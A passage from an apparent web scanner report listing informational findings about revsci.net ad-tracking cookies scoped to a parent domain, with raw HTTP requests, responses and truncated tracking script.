Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9mCyCCM1VkT2a+s=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:20 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:20 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:20 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.169. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/364341298.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/elPMXV+ser9duzVms/PpMe; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:47 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6487&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/364341298.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/elPMXV+ser9duzVms/PpMe; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:47 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6487&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:47 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:46 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.170. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/364341298.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7OC9yCTiWM1VkTma+k=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/
NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:05 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/364341298.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30xvkVUA6Ab/nfpD5Q==; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7OC9yCTiWM1VkTma+k=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/
Set-Cookie: NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:05 GMT; Path=/
Set-Cookie: rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/
X-Proc-ms: 14
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:13:04 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.171. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/36740428.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3ekPYaX+Mer9duzVms/fpMT; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:05 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6499&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/36740428.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3ekPYaX+Mer9duzVms/fpMT; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:05 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6499&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:05 GMT; Path=/
X-Proc-ms: 122
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:04 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.172. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/36740428.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFeU+FbwIUlVNWya6JSAvpln80ND94f6Pt9eNpD4dA52+8kOrNmqGxKr7OS2Tzwu4/IuK1NwSGYeUxtxQyhM3Z+6HbwyC2IteSIFUhs8vKdnBnw8DsPq4kmcuEJoI8J3nJDWXV7KJWyWaf+7RPcRWJQ0Wmgg7PETGvftUES/7vMlz2u9LmgGR/w99NoSaC1d7HM7rzg5lc7C3lUrHL9ZgVW0HBZ1XR/hPLadpbT3wbArYdm2Oqr25nMZce64VwXuH7zbD9+7pTkBUJwduZvS7Saia4nKA0; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:14:15 GMT; Path=/
NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:14:15 GMT; Path=/
rtc_0=MLsvsNUvMS5jJgG89H1UEJzjU+BBsKjEeIf8lOISRcnGovHI6UEjSecnRgLBNT8Lkm0Z6UFH5o7vRFRY8MuMgvGoVqILk+Ef3L6S+U2ToCodNBHEWablLktaqzXvV0/t4mDFE8G7gINZcw0zP9EsmOEEU6Pc75F0M551Bjh6mxtHMOMMxV/2E1w7zZJqYkmO11g8u4n8cdXr5Yef4Q48aNQWoA0k7fEy3bsDcBFH6e+vSJvXkn234H1VDVNDxrAHQmmi+yTuomwDMTdOoyoUQ1MxX3YwfrkMvonvDPbi6tbN+V5N+mbOqiXyakbjBTfgE/guB+ZkwybydKqpQwLhMs7qkXeQkPg1hrdYIqb9PhP1knwNupxp4cYRo/fEk3YFE3VJySPI4vKNXu6zlRzfeEaro4e0qoAh4nGZKHbX4JYfmdbcM11vMwenHTV1G6PILeuesJdg5/blQg==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:14:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

